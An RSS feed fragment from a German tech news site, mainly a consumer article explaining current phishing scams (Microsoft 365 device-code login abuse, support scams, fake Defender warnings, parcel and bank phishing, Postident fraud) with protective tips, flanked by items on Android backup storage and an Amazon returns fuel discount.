<p><strong>Richtlinienänderung:</strong> In 45 Tagen werden alle Daten, die in den Sicherungen deines Android-Geräts enthalten sind, auf das Speicherplatzlimit deines Google-Kontos angerechnet. Fotos und Videos in Google Fotos und MMS-Daten werden bereits jetzt in deinen Google-Kontospeicherplatz einbezogen. Mit dieser Änderung werden auch alle anderen gesicherten Daten wie SMS, Anruflisten, Geräteeinstellungen und App-Einstellungen auf deinen Google-Kontospeicherplatz angerechnet. Nach Inkrafttreten dieser Richtlinie wird deine Gerätesicherung möglicherweise mehr Speicherplatz belegen. Wenn das Speicherplatzlimit deines Google-Kontos überschritten ist, werden automatische Sicherungen pausiert, bis du Speicherplatz freigibst oder dein Abo upgradest.</p>
</blockquote>



<p>Laut Google werden die Auswirkungen dieser Änderung recht begrenzt sein. Android-Sicherungskopien werden im Durchschnitt etwa <strong>40 Megabyte</strong> zusätzlichen Speicherplatz beanspruchen. Gleichzeitig werden weitere Einstellungen eingeführt, die den Nutzern mehr Kontrolle darüber geben, was gesichert wird.</p>



<p>Zuvor wurde etwa bekannt, <a href="https://www.pcwelt.de/article/3181692/alle-android-nutzer-bekommen-nun-diese-wichtige-backupfunktion.html" target="_blank" rel="noreferrer noopener">dass Android-Nutzer eine wichtige neue Backup-Funktion erhalten</a>, mit der sie selbst entscheiden können, welche App-Daten gesichert werden sollen und welche nicht. Demnächst möchte Google noch einführen, dass Nutzer ihre Geräteeinstellungen, den Anrufverlauf sowie SMS- und MMS-Nachrichten aus dem Sicherungsvorgang ausschließen können.</p>



<p>Es ist erwähnenswert, dass Google im Mai gleichzeitig den kostenlosen Speicherplatz für neue Konten <a href="https://www.pcwelt.de/article/3140205/googles-gratis-onlinespeicher-schrumpft-falls-sie-google-nicht-ihre-telefonnummer-verraten-test.html" target="_blank" rel="noreferrer noopener">von 15 Gigabyte auf 5 Gigabyte reduziert hat.</a> Es sei denn, der Nutzer verknüpft eine Telefonnummer mit dem Konto.</p>



<p>Je nachdem, wie viele Daten Sie bereits in der Google Cloud gesichert haben, könnte es also eng werden, selbst wenn die Sicherung nur wenige MB groß ist. Oder Sie merken von der Änderung nicht wirklich viel, da Sie ohnehin auf andere <a href="https://www.pcwelt.de/article/3006100/die-besten-online-backup-dienste-im-vergleich-2.html" target="_blank" rel="noreferrer noopener">Backup-Methoden</a> setzen.</p>



<p>Ein Upgrade auf 100 GB in <a href="https://one.google.com/about/plans?hl=de&amp;g1_landing_page=60" target="_blank" rel="noreferrer noopener">Google One</a> kostet 1,99 Euro monatlich, 2,99 Euro für 200 GB oder 9,99 Euro monatlich für 2 TB Speicherplatz. Mit enthalten ist auch der Zugriff auf “neue und leistungsstarke Funktionen” in Google Gemini.</p>



<p><a href="https://www.pcwelt.de/article/3006100/die-besten-online-backup-dienste-im-vergleich-2.html" target="_blank" rel="noreferrer noopener">Die besten Online-Backup-Dienste im Vergleich: Nie mehr Daten verlieren</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Phishing-Fallen: KI-Mails, QR-Codes, falsche Warnungen – so schützen Sie sich]]></title>
<description><![CDATA[Zwei große Änderungen hat es in den vergangenen Jahren bei Phishing-Angriffen gegeben: Die Kriminellen erstellen mithilfe von generativer KI sprachlich fast perfekte Mails, die in Stil, Struktur und Tonalität kaum noch von legitimen Nachrichten zu unterscheiden sind. Wo früher holpriges Deutsch s...]]></description>
<link>https://tsecurity.de/de/3691032/windows-tipps/phishing-fallen-ki-mails-qr-codes-falsche-warnungen-so-schuetzen-sie-sich/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691032/windows-tipps/phishing-fallen-ki-mails-qr-codes-falsche-warnungen-so-schuetzen-sie-sich/</guid>
<pubDate>Fri, 24 Jul 2026 10:47:37 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Zwei große Änderungen hat es in den vergangenen Jahren bei Phishing-Angriffen gegeben: Die Kriminellen erstellen mithilfe von generativer KI sprachlich fast perfekte Mails, die in Stil, Struktur und Tonalität kaum noch von legitimen Nachrichten zu unterscheiden sind. Wo früher holpriges Deutsch sofort Misstrauen geweckt hat, liest sich heute eine Phishing-Mail wie eine echte Mitteilung von Microsoft, einer Bank oder einem Paketdienst.</p>



<p>Auch das Design wirkt meist höchst professionell. Zum anderen sind auch die technischen Tricks beim Datendiebstahl heute höher entwickelt. Einige Maschen umgehen sogar eine Zwei-Faktor-Authentifizierung. Das Ziel der Angreifer bleiben vor allem Zugangsdaten, Session-Tokens und persönliche Infos.</p>



<h2 class="wp-block-heading">1. Microsoft-365-Log-in-Falle trickst Zwei-Faktor-Anmeldung aus</h2>



<p>Eine neue Angriffsmethode verwendet den originalen Microsoft-Anmeldedialog und kommt entsprechend fast ohne gefälschte Webseiten aus. Die Kriminellen nutzen dafür den Oauth-Device-Code-Flow. Das ist ein Anmeldeverfahren für Geräte oder Programme, die keinen brauchbaren Browser oder keine komfortable Texteingabe bieten, etwa Smart-TVs, IoT-Geräte, Drucker oder CLI-Tools. </p>



<p>Offiziell heißt er „OAuth 2.0 Device Authorization Grant“. Mit der Methode lassen sich auch Konten übernehmen, die mit einer Zwei-Faktor-Authentifizierung geschützt sind.</p>



<p>Die Kriminellen schicken an ihre Opfer eine Phishing-Nachricht und geben vor, das Gerät der Opfer müsste für den Log-in ins Microsoft-365-Konto neu autorisiert werden. Die Nachrichten beginnen meist harmlos, etwa mit „Ihre Sitzung ist abgelaufen“, und bieten einen Link zur Neuanmeldung. Wenn das Opfer dem Link in der Nachricht folgt, landet es zunächst auf einer gefälschten Website, schließlich aber beim offiziellen Microsoft-Authentifizierungsverfahren für Geräte und Anwendungen (Oauth-Device-Code-Flow).</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a63269712915"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Phishing-Fallen-M365-Phishing-Quelle-Proofpoint.jpg?quality=50&amp;strip=all" alt="Phishing Fallen M365 Phishing Quelle Proofpoint" class="wp-image-3187589" width="1140" height="1082" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Bei diesem Trick übernehmen die Angreifer auch Konten, die mit einem zweiten Faktor geschützt sind. Dafür kombinieren sie die echten Authentifizierungsseiten von Microsoft und Phishing-Webseiten.</p></figcaption></figure><p class="imageCredit">Proofpoint</p></div>



<p>Es handelt sich um echte Microsoft-Meldungen und Webseiten. Allerdings autorisiert das Opfer nicht den Zugang zu seinem eigenen PC oder Smartphone, sondern eine Anwendung der Kriminellen. Diese bekommen nach der Freigabe durch das getäuschte Opfer einen Access-Token. Damit kann die feindliche Anwendung per API auf das Microsoft-Konto zugreifen, ohne dass noch einmal ein Passwort eingegeben werden muss.</p>



<p>Übrigens: Die meisten dieser Angriffe verstecken den Link zur gefälschten Website in einem QR-Code. Dieser entgeht den Spam-Filtern eher als ein üblicher Link, und es lässt die meisten Opfer vom PC auf das Smartphone wechseln. </p>



<p>Auf diesem ist es wegen des kleineren Bildschirms und oft fehlender Sicherheits-Software noch wahrscheinlicher, dass das Opfer die Täuschung nicht bemerkt. <a href="https://tinyurl.com/2xhd6n6d" target="_blank" rel="noreferrer noopener">Eine ausführliche Analyse der Angriffe auf Microsoft-365-Konten haben die Sicherheitsexperten von Proofpoint veröffentlicht</a>.</p>



<h2 class="wp-block-heading">2. Support-Masche: Ihr Computer ist gesperrt &amp; Co.</h2>



<p>Die Support-Masche ist zwar nicht neu, funktioniert aber nach wie vor: Noch immer fallen zahlreiche Menschen auf die perfide Betrugsstrategie herein. Zu den prominenten Opfern zählt Bundestagspräsidentin Julia Klöckner. </p>



<p>Mutmaßlich staatlich organisierte Angreifer kontaktierten sie über den Messenger-Dienst Signal und gaben sich als vermeintliche Signal-Support-Mitarbeiter aus. Unter einem Vorwand forderten sie Klöckner und weitere Politiker auf, ihre PIN einzugeben. Dadurch erlangten die Angreifer Zugriff auf die Signal-Konten der Betroffenen – und damit auf private Chats und Kontakte.</p>



<p>Das Bundesamt für Verfassungsschutz und das Bundesamt für Sicherheit in der Informationstechnik (BSI) haben gemeinsam einen <a href="https://tinyurl.com/yc89cfjd" target="_blank" rel="noreferrer noopener">Leitfaden veröffentlicht</a>, der potenziellen Opfern hilft zu prüfen, ob ihr Signal-Konto übernommen wurde.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a632697134c5"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Phishing-Fallen-MS-Support-Quelle-Bundesnetzagentur.png" alt="Phishing Fallen MS Support Quelle Bundesnetzagentur" class="wp-image-3187588" width="938" height="640" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Phishing mit der Support-Masche. Durch eine vorgetäuschte Windows- oder Defender-Warnung werden Sie zu einem Telefongespräch mit den Angreifern gedrängt.</p></figcaption></figure><p class="imageCredit">Bundesnetzagentur</p></div>



<p>Ebenfalls weiterhin verbreitet sind Angriffe durch angebliche Microsoft-Support-Mitarbeiter. Die Betrüger kontaktieren ihre Opfer per Telefon, E-Mail oder über gefälschte Pop-up-Warnungen im Browser. </p>



<p>Dabei behaupten sie, der Windows-PC habe ein Sicherheitsproblem – etwa sei der Computer gesperrt oder mit Schadsoftware infiziert. Anschließend versuchen sie, die Betroffenen zur Installation einer Fernwartungssoftware oder eines vermeintlichen Sicherheitstools zu bewegen. Tatsächlich erhalten die Angreifer dadurch oft vollständigen Zugriff auf den Rechner.</p>



<h2 class="wp-block-heading">3. Gefälschter Microsoft Defender warnt</h2>



<p>Der Microsoft Defender ist ein Windows-Bordmittel und schützt PCs gegen alle bekannten PC-Viren. Entsprechend alarmierend ist für viele Nutzer eine Warnung dieses Antiviren-Tools. Eine gefälschte Form dieser Warnung erscheint mal per E-Mail, mal als Pop-up im Browser. In diesen Nachrichten wird behauptet, der Schutz des Defenders müsse kostenpflichtig erneuert werden. In der Folge werden die Nutzer auf gefälschte Shop-Webseiten geleitet, die eine Zahlung für einen Virenschutz verlangen.</p>



<p>Grundsätzlich gilt: Der Microsoft Defender ist auf Privat-PCs ein Bordmittel und kostenlos in Windows enthalten. Eine Zahlung ist nicht nötig. Sollte die Warnung per Mail bei Ihnen landen, löschen Sie diese einfach. Schlägt sie als Pop-up im Browser auf, schließen Sie einfach das Browser-Fenster, notfalls mit der Tastenkombination „Alt+F4”. </p>



<p><a href="https://tinyurl.com/yaz82hf3" target="_blank" rel="noreferrer noopener">Der Antivirenspezialist Norton hat eine Anleitung veröffentlicht</a>, die erklärt, wie sich solche Pop-up-Warnungen im Browser beseitigen lassen, falls sie sich im System festgesetzt haben.</p>



<h2 class="wp-block-heading">4. Microsoft-Onedrive: Cloud-Phishing über Freigaben</h2>



<p>Cloud-Dienste wie Onedrive von Microsoft nutzen viele Windows-Nutzer mehrmals täglich. Genau deshalb sind sie ein attraktives Ziel für Phishing. Statt klassischer E-Mails mit Dateianhängen erhalten die Nutzer Freigabe-Benachrichtigungen mit einem Betreff wie „Dokument wurde mit Ihnen geteilt“. Der Inhalt wirkt meist harmlos und oft beruflich relevant: Rechnungen, Projektpläne, Gehaltslisten oder interne Dokumente.</p>



<p>Besonders tückisch ist die Kombination aus echten und gefälschten Elementen. Manche Angriffe nutzen tatsächlich legitime Cloud-Plattformen, bieten dort aber manipulierte Dokumente an. Das Ziel dieser Angriffe sind mehrheitlich die Log-in-Daten der Opfer zu Ihren Cloud- und Mail-Konten. Diese werden dann von den Angreifern übernommen und etwa für neue Phishing-Attacken genutzt.</p>



<h2 class="wp-block-heading">5. Lieferdienste, Lieferdienste und noch mal Lieferdienste</h2>



<p>Phishing im Namen von Paketdiensten gehört zu den stabilsten Angriffsmustern überhaupt und wird gleichzeitig immer ausgefeilter. Der Grund ist die hohe Alltagstauglichkeit: Fast jeder erwartet regelmäßig Lieferungen und ist deshalb kaum misstrauisch, wenn eine Mail, SMS oder Whatsapp zum Thema Paketversand eintrudelt. Moderne Varianten enthalten nicht nur einfache Textlinks, sondern vollständige Tracking-Systeme.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a632697140c0"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Phishing-Fallen-Paket-Phishing.png?w=1200" alt="Phishing Fallen Paket Phishing" class="wp-image-3187584" width="1200" height="539" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Hier sehen Sie vier Schritte eines vorgeblichen Lieferdienstes, der Ihnen ein Paket zustellen möchte. In weiteren Schritten sollen Sie Ihr Kundenkonto mit persönlichen Daten vervollständigen und eine Expresslieferung bezahlen.</p></figcaption></figure><p class="imageCredit">Arne Arnold</p></div>



<p>Diese Seiten sind dynamisch aufgebaut und simulieren echte Logistikprozesse. Beim Sendungsverlauf heißt es dann etwa: „Zustellung fehlgeschlagen – bitte Adresse bestätigen“ oder „Letzte Möglichkeit zur Terminänderung“. Besonders kritisch ist die Kombination aus Zeitdruck und Kontext. Wer Opfer eines solchen Angriffs wird, gibt meist seine Log-in-Daten für Shopping- oder Zahlungsdienste preis. Oder er überweist den Angreifern direkt Geld, da angeblich Steuern, Bearbeitungsgebühren oder ein Expresszuschlag fällig sind.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a632697149f8"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Phishing-Fallen-Paket-Phishing-Bezahlung.png?w=1200" alt="Phishing Fallen Paket Phishing Bezahlung" class="wp-image-3187585" width="1200" height="645" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Eine Phishing-Webseite eines vorgeblichen Lieferdienstes, die hier eine Nachzahlung abrechnen möchte, bevor das Paket zugestellt werden kann.</p></figcaption></figure><p class="imageCredit">Arne Arnold</p></div>



<p>Übrigens: Ab dem 1. Juli 2026 gibt es zusätzliche Abgaben auf Sendungen aus Nicht-EU-Ländern. Für Waren unter 150 Euro sind dann pauschal 3 Euro Zollgebühr und eine Einfuhrumsatzsteuer fällig. Einige Kurierdienste verlangen zusätzlich eine Servicepauschale für diese Zollanmeldung. Über die genauen Kosten informiert <a href="https://tinyurl.com/sztfupt4" target="_blank" rel="noreferrer noopener">eine Seite der Verbraucherzentrale NRW</a>. Es lohnt sich, die tatsächlichen Kosten zu kennen, denn es ist wahrscheinlich, dass zu diesem Termin vermehrt Phishing-Mails zu diesem Thema versendet werden.</p>



<h2 class="wp-block-heading">6. Phishing zu Online-Banking gibt es immer</h2>



<p>Phishing zum Online-Banking gibt es fast schon so lange wie das Online-Banking selbst. Die Bedrohungslage ist aber so angespannt wie nie, denn die Angriffe sind nun wirklich zahlreich. <a href="https://tinyurl.com/y58m5smy" target="_blank" rel="noreferrer noopener">Über die neuesten Phishing-Fallen informieren unter anderem die Verbraucherzentralen</a>.</p>



<p>Beispiele aus dem Mai 2026 lauten etwa so: „Bestätigung Ihrer Mobilfunknummer erforderlich“. Absender ist vorgeblich die Easybank. Eine Fälschung von Commerzbank-Mails warnt vor einem fälligen „Photo-TAN Update“, bei dem ein „einmaliger Abgleich der Zugangsdaten“ nötig ist. </p>



<p>Andere Phishing-Mails geben vor, von der Deutschen Bank zu sein, und fordern eine Reaktivierung des „photoTAN-Sicherheitszertifikats“. Auch Kunden der DKB erhielten im Mai Phishing-Mails.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a632697157e7"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Phishing-Fallen-commerzbank2-Quelle-Verbraucherzentrale.png" alt="Phishing Fallen commerzbank2 Quelle Verbraucherzentrale" class="wp-image-3187583" width="460" height="665" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Eine aktuelle Phishing-Mail, die auf Kunden der Commerzbank abzielt. Im Text wird ordentlich Druck aufgebaut. Wer nicht reagiert, verliert angeblich „am nächsten Werktag“ den Zugriff auf sein Bankkonto.</p></figcaption></figure><p class="imageCredit">Verbraucherzentrale</p></div>



<p>Sollten Sie eine Mail von Ihrer Bank bekommen, klicken Sie auf keinen Fall auf einen der Links in dieser Mail. Wenn Sie sich unsicher sind, ob Sie reagieren sollen, rufen Sie die Website Ihrer Bank über Ihren Browser auf. </p>



<p>Sollte es tatsächlich ein Anliegen der Bank geben, wird es Ihnen nach dem Einloggen in Ihr Online-Konto angezeigt. Oder Sie rufen Ihre Bank einfach per Telefon an und fragen, ob Informationen von Ihnen benötigt werden.</p>



<h2 class="wp-block-heading">7. Phishing per Post: Kreditbetrug per Postident-Verfahren</h2>



<p>Diese Phishing-Angriffe erreichen Sie per Post in Ihrem echten Briefkasten. Die Briefe geben vor, von Ihrer Bank zu stammen, und fordern Sie auf, Ihre Daten erneut per Postident zu bestätigen. Postident ist ein Verfahren der Post, mit dem Sie Ihre Identität gegenüber anderen, etwa einer neuen Bank oder einem Kreditinstitut, bestätigen können. Wer das beigefügte Schreiben nutzt, legitimiert in der Regel einen hohen Kredit bei einer anderen Bank.</p>



<p>Schäden von 15.000 bis 25.000 Euro sind hier keine Seltenheit. Vorangegangen ist meist ein Diebstahl Ihrer genauen Daten (Postadresse, Hausbank, Arbeitgeber, Verdienst), den die Angreifer dann nutzen. An die Daten kommen die Kriminellen etwa über gefälschte Wohnungsinserate bei Immoscout24 oder ähnlichen Portalen. Wer sich auf eine Wohnung oder ein Haus mit Gehaltszetteln und weiteren Angaben bewirbt, hat bereits alle wichtigen Daten für den Postident-Betrug verraten. Seien Sie beim Postident-Verfahren stets besonders vorsichtig. Konkrete Tipps lesen Sie <a href="https://tinyurl.com/bdbnmxhn" target="_blank" rel="noreferrer noopener">hier</a>.</p>



<h2 class="wp-block-heading">Sicherheitstipps: Phishing erkennen und blockieren</h2>



<p><strong>An diesen Merkmalen erkennen Sie betrügerische Nachrichten:</strong></p>



<ul class="wp-block-list">
<li><strong>Unverlangter Kontakt:</strong> Sie erhalten eine E-Mail, Whatsapp oder SMS über eine Gutschrift, eine Lastschrift oder andere finanzielle Ansprüche, obwohl Sie aktuell keine Buchung storniert oder reklamiert haben.</li>



<li><strong>Zeitdruck:</strong> Die Nachricht suggeriert dringenden Handlungsbedarf und fordert zur schnellen Reaktion auf.</li>



<li><strong>Verdächtige Links:</strong> Die Links in der Nachricht sind hinter einem QR-Code maskiert, führen zu unpassenden Domains oder sind ungewöhnlich lang.</li>



<li><strong>Aufforderung zur Dateneingabe:</strong> Seriöse Unternehmen fordern in Nachrichten oder Mails nur äußerst selten zur Eingabe sensibler Daten auf.</li>



<li><strong>Unpersönliche Anrede:</strong> Oft fehlt die namentliche Ansprache oder es werden generische Formulierungen verwendet.</li>
</ul>



<p><strong>Diese Maßnahmen schützen vor Phishing-Fallen:</strong></p>



<ul class="wp-block-list">
<li><strong>E-Mail, SMS und Whatsapp &amp; Co. sind keine geschlossenen Nachrichtenkanäle:</strong> Sie müssen damit rechnen, auch betrügerische Nachrichten zu erhalten.</li>



<li><strong>Misstrauen Sie Links in Nachrichten:</strong> Klicken Sie keine Links an und scannen Sie keine QR-Codes, wenn Log-in-, Zahlungs- oder Sicherheitsaufforderungen in der Mail stehen. Öffnen Sie den jeweiligen Dienst im Browser über die manuelle Eingabe der Adresse.</li>



<li><strong>Nutzen Sie Browser und Passwortmanager als Frühwarnsystem: </strong>Wenn Ihr <a href="https://www.pcwelt.de/article/1204833/test-die-besten-passwort-manager.html" target="_blank" rel="noreferrer noopener">Passwortmanager</a> Ihre Log-in-Daten auf einer Webseite nicht einfügen möchte, dann ist die Domain vermutlich gefälscht. Achten Sie zudem auf die Warnungen Ihres Browsers.</li>



<li><strong>MFA aktivieren: </strong>Nutzen Sie immer eine Zwei- oder Multifaktor-Authentifizierung, wenn diese angeboten wird. Vor allem <a href="http://www.pcwelt.de/2107907" target="_blank" rel="noreferrer noopener">Passkeys</a> erhöhen die Sicherheit.</li>



<li><strong>Remote-Support misstrauen: </strong>Installieren Sie keine Fernwartungs-Tools, nachdem Sie unaufgefordert kontaktiert wurden.</li>



<li><strong>Freigaben hinterfragen: </strong>Wenn Sie Freigaben für Dateien in Cloud-Speichern erhalten, kontaktieren Sie zunächst den Absender, idealerweise telefonisch.</li>
</ul>



<p>Infos zu aktuellen Angriffen: Informieren Sie sich über Phishing-Kampagnen etwa bei der <a href="https://tinyurl.com/y58m5smy" target="_blank" rel="noreferrer noopener">Verbraucherzentrale NRW</a>.</p>



<p><strong>Als letzte Verteidigungslinie lassen sich Antivirenprogramme, Browserschutz und Spezial-Tools einsetzen:</strong></p>



<ul class="wp-block-list">
<li><strong>Antivirus:</strong> Große Sicherheits-Suiten wie <a href="https://www.awin1.com/cread.php?awinmid=14693&amp;awinaffid=486277&amp;clickref=rss&amp;platform=dl&amp;ued=http://www.gdata.de" target="_blank" rel="noreferrer noopener">G Data Internet Security</a> filtern Phishing-Mails heraus, bevor sie diese Nachrichten öffnen.</li>



<li><strong>Browser-Schutz: </strong>Browser von Sicherheitsanbietern blockieren viele aktuelle Phishing-Seiten, etwa der <a href="https://neobrowser.ai/" target="_blank" rel="noreferrer noopener">KI-Browser Norton Neo</a>.</li>



<li><strong>Spezial-Tools:</strong> KI-Chatbots wie <a href="https://www.awin1.com/cread.php?awinaffid=486277&amp;awinmid=11660&amp;clickref=rss&amp;ued=http://www.bitdefender.com/de-de/consumer/scamio" target="_blank" rel="noreferrer noopener">Scamio von Bitdefender</a> begutachten verdächtige Nachrichten und warnen vor gefährlichen Inhalten.</li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a63269717055"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Phishing-Fallen-Verdaechtige-Website-blockiert-Neo.png?w=1200" alt="Phishing Fallen Verdaechtige Website blockiert Neo" class="wp-image-3187587" width="1200" height="645" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Einen guten Phishing-Schutz erhalten Sie beispielsweise über Browser von Sicherheitsanbietern wie hier dem Browser Norton Neo.</p></figcaption></figure><p class="imageCredit">Arne Arnold</p></div>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Amazon-Retoure wird zum Tankrabatt: So sparen Sie jetzt 5 Cent pro Liter]]></title>
<description><![CDATA[Amazon-Kunden können sich derzeit einen Tankrabatt sichern, wenn sie ihre Retouren an ausgewählten Tankstellen abgeben. Für jede erfolgreich abgewickelte Rücksendung erhalten Kunden einen Gutschein über 5 Cent Rabatt pro Liter Kraftstoff. Die Aktion stammt vom Tankstellenbetreiber Enilive und läu...]]></description>
<link>https://tsecurity.de/de/3690999/it-nachrichten/amazon-retoure-wird-zum-tankrabatt-so-sparen-sie-jetzt-5-cent-pro-liter/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690999/it-nachrichten/amazon-retoure-wird-zum-tankrabatt-so-sparen-sie-jetzt-5-cent-pro-liter/</guid>
